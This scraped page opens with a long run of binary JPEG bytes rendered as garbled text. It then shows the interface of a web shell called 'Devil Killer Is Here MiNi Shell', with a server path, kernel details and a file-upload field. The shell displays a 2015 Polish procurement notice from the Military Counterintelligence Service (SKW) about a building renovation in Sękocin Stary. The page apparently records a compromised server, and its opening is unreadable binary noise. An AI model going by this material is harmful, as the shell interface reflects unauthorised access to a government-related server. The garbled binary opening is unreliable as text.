JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150526/76179-N-2015.html

<p class="kh_header"><b>Warszawa: REMONT POMIESZCZEŃ W BUDYNKU NR 1 NA TERENIE NIERUCHOMOŚCI W SĘKOCINIE STARYM (oznaczenie sprawy: ZP-11-SKW-2015)</b><br>
<b>Numer ogłoszenia: 76179 - 2015; data zamieszczenia: 26.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Służba Kontrwywiadu Wojskowego , ul. Wojciecha Oczki 1, 02-007 Warszawa, woj. mazowieckie, tel. 261 846 131, 261 841 119, faks 261 841 377, 261 841 203.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT POMIESZCZEŃ W BUDYNKU NR 1 NA TERENIE NIERUCHOMOŚCI W SĘKOCINIE STARYM (oznaczenie sprawy: ZP-11-SKW-2015).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu pomieszczeń w budynku nr 1 na terenie nieruchomości w Sękocinie Starym.

Zakres remontu obejmuje między innymi:
1)roboty demontażowe:
a)demontaż stolarki drzwiowej - 29 szt.,
b)rozbiórka ścian i ścianek ok. - 40 m3,
c)demontaż okładzin ściennych z płyt GK ok. - 1070 m2,
d)demontaż posadzek ok. - 400 m2, 
e)rozbiórka sufitów podwieszanych ok. - 114 m2,
f)demontaż istniejących urządzeń sanitarnych ok. - 9 kpl, 
g)demontaż instalacji elektrycznych ok. - 9 kpl, 
2)roboty montażowe:
a)wykonanie izolacji przeciwwilgociowych ok. - 420 m2,
b)wykonanie nowych okładzin posadzkowych ok. - 420 m2,
c)wykonanie okładzin ściennych ok. - 1080 m2,
d)montaż nowej stolarki drzwiowej - 31 szt.,
e)montaż nowych urządzeń sanitarnych ok. - 11 kpl.,
f)montaż nowej instalacji elektrycznych wraz z osprzętem ok. - 9 kpl.,
g)montaż sufitów podwieszanych ok. - 670 m2,
h)wykonanie powłok malarskich ok. - 1250 m2, 
i)wykonanie i montaż belek dekoracyjnych z drewna ok. - 110 mb,
j)wykonanie i montaż balustrady balkonowej ok. - 80 m2..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewidywane zamówienia uzupełniające w wysokości 30% wartości zamówienia podstawowego. Zamówienia uzupełniające będą dotyczyć przedmiotu zamówienia określonego w opisie przedmiotu zamówienia (SIWZ) sporządzonego dla zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Wykonawca zobowiązany będzie wykazać, iż wykonał, jako strona umowy, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną, obejmującą swoim zakresem prace w zakresie branży (jednocześnie): budowlanej, sanitarnej i elektrycznej, o wartości  min. 800.000,00 zł brutto, polegające na budowie, przebudowie lub remoncie obiektu budowlanego.
Na przedmiotową robotę Wykonawca załączy dowód(ody), o których mowa w §1 ust. 2 pkt. 2) Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231), określające czy robota ta została wykonana w sposób należyty oraz wskazujące, czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.
W przypadku, gdy roboty budowlane wykazane w wykazie były realizowane na rzecz Zamawiającego - Służby Kontrwywiadu Wojskowego, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Wykonawca zobowiązany będzie oświadczyć, że dysponuje osobami niezbędnymi do wykonania zamówienia, tj. minimum: 
- 1 osobą przewidzianą do kierowania robotami w branży budowlanej, posiadającą wymagane zgodnie z art. 12 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2013 r. poz. 1409), uprawnienia w specjalności budowlanej i przynależącą do odpowiedniej izby zawodowej;
- 1 osobą przewidzianą do kierowania robotami w branży elektrycznej, posiadającą wymagane zgodnie z art. 12 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2013 r. poz. 1409), uprawnienia w specjalności elektrycznej i przynależącą do odpowiedniej izby zawodowej
- 1 osobą przewidzianą do kierowania robotami w branży sanitarnej, posiadającą wymagane zgodnie z art. 12 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2013 r. poz. 1409), uprawnienia w specjalności sanitarnej i przynależącą do odpowiedniej izby zawodowej.

Zamawiający dopuszcza możliwość łączenia przez jedną osobę funkcji kierownika robót w różnych branżach, pod warunkiem posiadania przez nią stosownych uprawnień określonych powyżej dla danego kierownika robót. W przypadku, gdy Wykonawca dysponuje personelem kierowniczym spoza terytorium RP, zamiast ww. uprawnień, osoby te muszą:
- posiadać wykształcenie i kwalifikacje wymagane do świadczenia usług we wskazanej branży w kraju zamieszkania tych osób,
- posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanej branży zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych w państwach członkowskich Unii Europejskiej lub posiadać prawo do świadczenia usług transgranicznych. 


Ponadto Wykonawca oświadczyć, iż dysponuje minimum (Zamawiający nie dopuszcza łączenia funkcji kierownika robót z funkcją pracowników n/w).:
- 2 osobami o kwalifikacjach zawodowych - elektryk,
- 4 osobami o kwalifikacjach zawodowych - ogólnobudolwanych,
- 2 osobami o kwalifikacjach zawodowych w branży sanitarnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający wymaga wskazania w wykazie co najmniej jednej roboty budowlanej, obejmującej swoim zakresem prace w zakresie branży (jednocześnie): budowlanej, sanitarnej i elektrycznej, o wartości  min. 800.000,00 zł brutto, polegające na budowie, przebudowie lub remoncie obiektu budowlanego. Natomiast podanie w wykazie większej liczby robót wykonanych samodzielnie (bez polegania na zasobach innych podmiotów na zasadach opisanych art. 26 ust. 2b ustawy), spełniających powyższe wymogi, pozwoli na uzyskanie jak największej liczby punktów i zakwalifikowanie się do kolejnego etapu. Jednocześnie nie jest wymagana informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie.
Wykonawca powołujący się na doświadczenie oraz osoby zdolne do wykonania zamówienia innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Wybór wykonawców będzie wyglądał następująco:
a)W celu wyłonienia Wykonawców, którzy zostaną zaproszeni do złożenia ofert Zamawiający przyzna Wykonawcy 1 pkt za każdą robotę budowlaną wskazaną w wykazie, spełniającą wymagania określone w  pkt III.4.1).
b)Podstawę do wezwania, na podstawie art. 26 ust. 3 ustawy, do uzupełnienia dokumentów składanych w celu wykazania spełniania warunku udziału w postępowaniu w zakresie posiadania wiedzy i doświadczenia będzie sytuacja, jeżeli żadna z robót budowlanych wykazanych w wykazie załączonym do wniosku nie będzie spełniała wymagań określonych w pkt III.4.1), co będzie oznaczać, iż Wykonawca nie spełnia tego warunku w stopniu minimalnym (wymagana min. 1 robota budowlana). Jeżeli wykonawca spełni warunek posiadania wiedzy i doświadczenia chociażby w stopniu minimalnym, przepis art. 26 ust. 3 ustawy Prawo zamówień publicznych (Dz.U. z 2013r. poz. 907 z późn. zm.), zwanej dalej ustawą, nie będzie miał zastosowania, a Zamawiający nie będzie wzywał wykonawcy do uzupełnienia dokumentów w tym zakresie.
c)W sytuacji, gdy Wykonawca potwierdzi spełnienie warunku udziału w postępowaniu dot. wiedzy i doświadczenia dopiero w wyniku uzupełnienia wykazu robót na wezwanie Zamawiającego wystosowane na podstawie art. 26 ust. 3 ustawy, Wykonawcy za żadną robotę budowlaną wskazaną w uzupełnianym wykazie spełniającą wymagania określone w pkt III.4.1) nie będą  przyznawane punkty.

d)Zamawiający nie będzie punktował wskazanych w wykazie robót budowlanych spełniających wymagania określone w pkt III.4.1), realizowanych przez inne podmioty, na które powołał się Wykonawca na zasadach określonych w art. 26 ust. 2b ustawy, i udowodnił Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Tak więc w przypadku wykazania przez Wykonawcę tylko robót budowlanych spełniających wymagania określone w pkt III.4.1), realizowanych przez inne podmioty, na które powołał się Wykonawca na zasadach określonych w art. 26 ust. 2b ustawy - Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, przyznając jednak temu Wykonawcy 0 pkt.  
e)W przypadku gdy na ostatniej pozycji, dwóm lub więcej Wykonawcom zostanie przyznana ta sama liczba punktów, Zamawiający wybierze spośród nich Wykonawcę, którego wartość roboty budowlanej wskazanej w wykazie robót (z wyjątkiem roboty, o której mowa w lit. d), chyba, że tylko takie roboty wskazali ci Wykonawcy), spełniającej wymagania określone w  pkt III.4.1), będzie wyższa.

Zamawiający zaprosi do składania ofert Wykonawców (nie więcej niż 5), którzy spełnią warunki udziału 
w postępowaniu i uzyskają największą ilość punktów. Ponadto, zgodnie z art. 51 ust. 3 ustawy, jeżeli liczba wykonawców, którzy spełniają warunki udziału w postępowaniu jest mniejsza niż określona w ogłoszeniu o zamówieniu, Zamawiający zaprosi wszystkich wykonawców, bez przyznawania im punktów. Natomiast, w przypadku gdy liczba wykonawców spełniających warunki udziału w postępowaniu jest równa liczbie wskazanej w ogłoszeniu o zamówieniu (tj. 5) Zamawiający zaprosi wszystkich wykonawców, przyznając jednocześnie każdemu po jednym punkcie.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - gwarancja - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana umowy w stosunku do treści oferty złożonej przez Wykonawcę w trakcie postępowania o udzielenia zamówienia publicznego obejmującego przedmiot umowy dopuszczalna jest w przypadku: 
1)zmian terminu wykonania umowy, na wniosek Wykonawcy w następujących przypadkach: 
a)opóźnienia związanego z przekazaniem terenu budowy lub dokonaniem odbioru końcowego robót spowodowanego przez Zamawiającego,
b)jakichkolwiek opóźnień, utrudnień lub przeszkód spowodowanych przez osoby 
i podmioty trzecie, jeżeli te opóźnienia nie są wynikiem działania lub zaniechania działania Wykonawcy, 
c)jeżeli wystąpiła konieczność przeprowadzenia zamówień dodatkowych wpływających 
na dotrzymanie pierwotnego terminu realizacji umowy, szczególnie w następstwie okoliczności, których w normalnych warunkach Zamawiający nie mógł przewidzieć, 
d)wstrzymania robót lub wystąpienia przerw w pracach z przyczyn leżących po stronie Zamawiającego, 
e)wystąpienia siły wyższej, uniemożliwiającej wykonanie przedmiotu umowy zgodnie 
z terminem określonym w umowie - dopuszcza się zmianę terminu końcowego realizacji, nie dłużej jednak niż o czas trwania tych okoliczności, 
f)zaistnienia warunków atmosferycznych wykluczających prawidłowe technologicznie wykonanie prac, po akceptacji wniosku przez Zamawiającego, 
g)zmiany przepisów prawa powszechnie obowiązującego w zakresie w jakim mogą one wpłynąć na terminowość realizacji umowy, 
2)dokonania przez Zamawiającego zmian w dokumentacji projektowej, zatwierdzonych przez Projektanta, postanowienia zawartej umowy ulegną zmianie w celu dostosowania obowiązków Wykonawcy w zakresie wykonania przedmiotu umowy do zgodności z aktualną dokumentacją projektową. 
3)Wykonawca może samodzielnie zgłaszać Zamawiającemu propozycje zmian w dokumentacji projektowej. Zgłoszenie powinno nastąpić w formie pisemnej, z opisem proponowanej zmiany oraz podaniem wyliczenia ekonomicznych korzyści i uzasadnienia technicznego dla jej wprowadzenia oraz wynikających z tego technicznych korzyści dla Zamawiającego. Jakiekolwiek proponowane przez Wykonawcę zmiany w dokumentacji projektowej wymagają dla swej ważności pozytywnej oceny Projektanta i akceptacji przez Zamawiającego. W przypadku uzyskania takiej akceptacji postanowienia zawartej umowy ulegną zmianie w celu dostosowania obowiązków Wykonawcy w zakresie wykonania przedmiotu umowy do zgodności z aktualną dokumentacją projektową.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kancelaria Jawna SKW, ul. T.Chałubińskiego/ róg ul. W.Oczki 1 (tel. 261 846 131) - dotyczy tylko wykonawców, którzy zostaną zaproszeni do składania ofert po ocenie wniosków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2015 godzina 09:00, miejsce: Sekretariat Biura Administracyjnego SKW poprzez Kancelarię Jawną SKW mieszczącą się przy ul. T.Chałubińskiego/róg ul. W.Oczki 1 (tel. 261 846 131).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> INSTRUKCJA DLA WYKONAWCÓW SKŁADAJĄCYCH WNIOSKI

WYMAGANIA DOTYCZĄCE DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCÓW 

1)Wymagania dotyczące dokumentów, o których mowa w ogłoszeniu o zamówieniu reguluje m. in. Rozporządzenie Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013 r., poz. 231), zwanego dalej rozporządzeniem.
Oświadczenie o spełnianiu warunków oraz zobowiązania podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia muszą być złożone w formie oryginału. Pozostałe dokumenty mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 
W przypadku poświadczania za zgodność z oryginałem kopii dokumentów przez osoby nie wymienione w dokumencie rejestracyjnym Wykonawcy, należy do wniosku dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza lub przez wystawcę pełnomocnictwa. 

UWAGA: Zamawiający przypomina, aby dokumenty składane w formie kopii potwierdzonej za zgodność z oryginałem przez upoważnionego Wykonawcę były czytelne, kompletne 
i w przypadku, gdy zawierają się na kilku stronach były potwierdzone za zgodność z oryginałem na każdej ze stron. 

Dokumenty, oświadczenia oraz pełnomocnictwa sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 

2)Wykonawcy wspólnie ubiegający się o zamówienie (np. w formie tzw. konsorcjum) zgodnie z art. 23 ustawy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
Zgodnie z §7 ust. 2 rozporządzenia w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, kopie dokumentów dotyczących odpowiednio każdego z tych wykonawców są poświadczane za zgodność z oryginałem przez każdego z wykonawców z osobna lub pełnomocnika mającego umocowanie do działania w imieniu danego wykonawcy z osobna (umocowanie do działania w imieniu konsorcjum nie jest wystarczające).
Zamawiający wymaga, aby wraz z wnioskiem Wykonawcy wspólnie ubiegający się o zamówienie przedłożyli dokument (np. pełnomocnictwo) określający co najmniej jego zakres, strony występujące wspólnie oraz wskazujący pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia (pełnomocnictwo winno być przedstawione w formie oryginału, lub kopii potwierdzonej notarialnie, bądź przez jego wystawcę). 
Wykonawcy wspólnie ubiegający się o zamówienie (wszyscy członkowie konsorcjum) ponoszą solidarnie odpowiedzialność prawną za realizacje zamówienia.
W przypadku składania wniosku przez Wykonawców wspólnie ubiegających się o zamówienie należy: 
a) złożyć wniosek podpisany przez pełnomocnika; 
b) złożyć komplet dokumentów wymaganych przez Zamawiającego, z zastrzeżeniem, iż oświadczenie wymienione w ogłoszeniu o zamówieniu w sekcji III.4.2 oraz dokumenty wymienione w  sekcji III.4.4 składane są przez każdego z Wykonawców wspólnie ubiegających sie o zamówienie; 
c) wypełniając dokumenty powołujące sie na Wykonawcę, w miejscu - nazwa i adres Wykonawcy - należy wpisać dane dotyczące pełnomocnika, lidera. 


Przy ocenie wniosku składanego przez Wykonawców wspólnie ubiegających się o zamówienie, Zamawiający będzie brał pod uwagę ich łączną wiedzę i doświadczenie oraz osoby zdolne do wykonania zamówienia.
Spółka cywilna nie jest przedsiębiorcą, natomiast wspólnicy s.c. w ramach wykonywanej przez nich działalności gospodarczej uznawani są za przedsiębiorców i to wspólnicy są podmiotem praw i obowiązków z tytułu prowadzonej działalności. Wniosek składany przez spółki cywilne jest traktowany jako Wniosek Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (art. 23 ustawy). 


OPIS SPOSOBU PRZYGOTOWANIA WNIOSKU
Na stronie internetowej:
http://www.bip.skw.gov.pl/portal/skw/378/Ogloszenia_o_zamowieniach.html (w szczegółach sprawy nr ZP-11-SKW-2015),  
Zamawiający zamieścił formularze pomocne przy złożeniu wniosku, tj. formularz wniosku o dopuszczenie do udziału w postępowaniu i wykazu wykonanych robót budowlanych oraz wzory oświadczeń.
Wykonawca przystępujący do przetargu jest zobowiązany złożyć wypełniony w języku polskim wniosek (formularz zamieszczony na stronie internetowej) wraz ze wszystkimi dokumentami wymaganymi przez Zamawiającego. 


Wykaz wykonanych robót budowlanych powinien zawierać w szczególności:
- rodzaj robót wraz z informacją jaką branżę obejmują swoim zakresem;
- miejsce wykonania, wraz z podaniem dokładnego adresu;
- daty wykonania robót (zakończenia) - dzień, miesiąc, rok;
- wartość brutto wykonanej roboty;
- wartość brutto części roboty obejmującej wyłącznie prace w zakresie branży (jednocześnie): budowlanej, sanitarnej i elektrycznej, polegające na budowie, przebudowie lub remoncie obiektu budowlanego.

Do wykazu robót należy dołączyć dowody, o których mowa w pkt. III. 4.1) Ogłoszenia o zamówieniu.

UWAGA: w przypadku, gdy roboty budowlane wykazane w wykazie były realizowane na rzecz Zamawiającego -Służby Kontrwywiadu Wojskowego, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
Wniosek o dopuszczenie do udziału w przetargu ograniczonym powinien w szczególności zawierać:
- dane dotyczące Wykonawcy: nazwa, siedziba, nr telefonu/faksu, adres e-mail, Regon, NIP, imię 
i nazwisko osoby(ób) uprawnionych do porozumiewania się z Zamawiającym, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy podać również dane poszczególnych wykonawców oraz wskazać ich pełnomocnika (lidera);
- dane Zamawiającego: Służba Kontrwywiadu Wojskowego, ul. W. Oczki 1, 00-909 Warszawa 60;
